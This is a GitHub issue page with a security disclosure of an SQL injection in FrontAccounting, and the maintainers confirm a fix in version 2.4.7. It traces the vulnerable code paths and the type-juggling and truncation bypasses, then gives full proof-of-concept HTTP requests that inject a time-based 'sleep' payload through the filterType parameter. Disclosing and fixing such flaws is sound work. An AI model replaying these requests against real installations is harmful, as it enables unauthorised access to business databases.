Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection #38

Closed
Ginnz opened this issue Jan 7, 2019 · 2 comments
Closed

SQL Injection #38

Ginnz opened this issue Jan 7, 2019 · 2 comments

Comments

@Ginnz
Copy link

Ginnz commented Jan 7, 2019

Sorry,This is my first time to chat with people in English.

Frontaccounting is using function db_escape() to escape value. But some variables do not use the function db_escape().
environment : docker mattrayner/lamp:latest-1604

0x00 Description

includes/db/class.reflines_db.inc:156
If I set parameter $reference like ‘XXXXXX\’. Single quotes can escape.And I can inject in parameter $type
image
includes/references.inc:365
image
admin/db/voiding_db.inc:127
image
admin/void_transaction.php:316
image
admin/void_transaction.php:352
image
So parameter $type can be controlled
How about parameter $reference?
image
image
get_systype_db_info()
image
After that I found some insert statements of table grn_batch.
purchasing/includes/db/grn_db.inc:170
image
purchasing/includes/db/grn_db.inc:99
image
purchasing/po_receive_items.php:254
image
image
So parameter $reference can be controlled

0x01 Bypass:

  1. PHP
    switch ($type)
    The variable $type like ‘25’in here is same as ‘+25dasdsadasda.
    image
    image
  2. Mysql
    Converting a string into an integer has some problems in mysql.
    image
    '25'= '25dasdasdasd'= '+25dasdasdasd'
    image
    String and integer can be added.
  3. Mysql has SQL Truncation problem so that ‘\’ can be truncated

0x02 POC:

Settings such as ‘001/2018\’ will report an error, but ‘001/2018\’ will not . I noticed that refererence is 60 bytes, set the payload to 61 bytes like 001100422222222222222222222201700422222222222222212222/2018\\.it is 001100422222222222222222222201700422222222222222212222/2018\ in the database.

I am using po_entry_items.php, not the po_receive_items.php found above.
image

POST /FA1/purchasing/po_entry_items.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1/purchasing/po_entry_items.php?NewGRN=Yes
Content-Type: application/octet-stream
Content-Length: 343
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=6qb35uj2b4sv26em7d6f5i7qv3; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=i96j3h5r6hl16smme7tl0t3ie3

supplier_id=1&OrderDate=12/31/2018&ref=001100422222222222222222222201700422222222222222212222/2018\\&supp_ref=&dimension=0&StkLocation=DEF&delivery_address=N/A&_stock_id_edit=102&stock_id=101&qty=1&price=200.00&Comments=&Commit=Process%20GRN&_focus=supplier_id&_modified=0&_confirmed=&_token=YNHuXfwn6xEZH7dUBa196wxx&_random=1078360.0430200463

database:
image
image
image

POST /FA1//admin/void_transaction.php?JsHttpRequest=0-xml HTTP/1.1
Host: 127.0.0.1:8888
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8888/FA1//admin/void_transaction.php
Content-Type: application/octet-stream
Content-Length: 261
Connection: close
Cookie: FA83118f2a9a8a1d154096028879fc64db=3h40pcjb2t5apf0rlcblj1ahv6; FA40bcd2a463d0cb4ad9c1f4e4e156e4ab=1e2v29h21gv4efc5g2fr0fs0q0

filterType=%2b25%2c25)%20or%20sleep(1)%23&FromTransNo=1&ToTransNo=999999&date_=12/31/2018&memo_=&trans_no=3&selected_id=3&ConfirmVoiding=%u7EE7%u7EED%u8FDB%u884C&_focus=filterType&_modified=0&_confirmed=&_token=p6ySb5gc0z5JLK4DvaC9owxx&_random=578301.3136013072

The final execution of the sql statement is like this:

SELECT * FROM 0_reflines WHERE trans_type='+25,25) or sleep(1)#' AND CHAR_LENGTH(`prefix`) AND LEFT('20170042222222222222222222220170042222222222222221222222221\', CHAR_LENGTH(`prefix`)) = `prefix` UNION SELECT * FROM 0_reflines WHERE trans_type='+25,25) and sleep(1)#' AND `prefix`=''
@itronics
Copy link
Contributor

Thank you very much for this deep analysis. I have just pushed fix to the repo together with changes related to strict mode.

@FrontAccountingERP
Copy link
Owner

This issue was finally fixed in 2.4.7.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

3 participants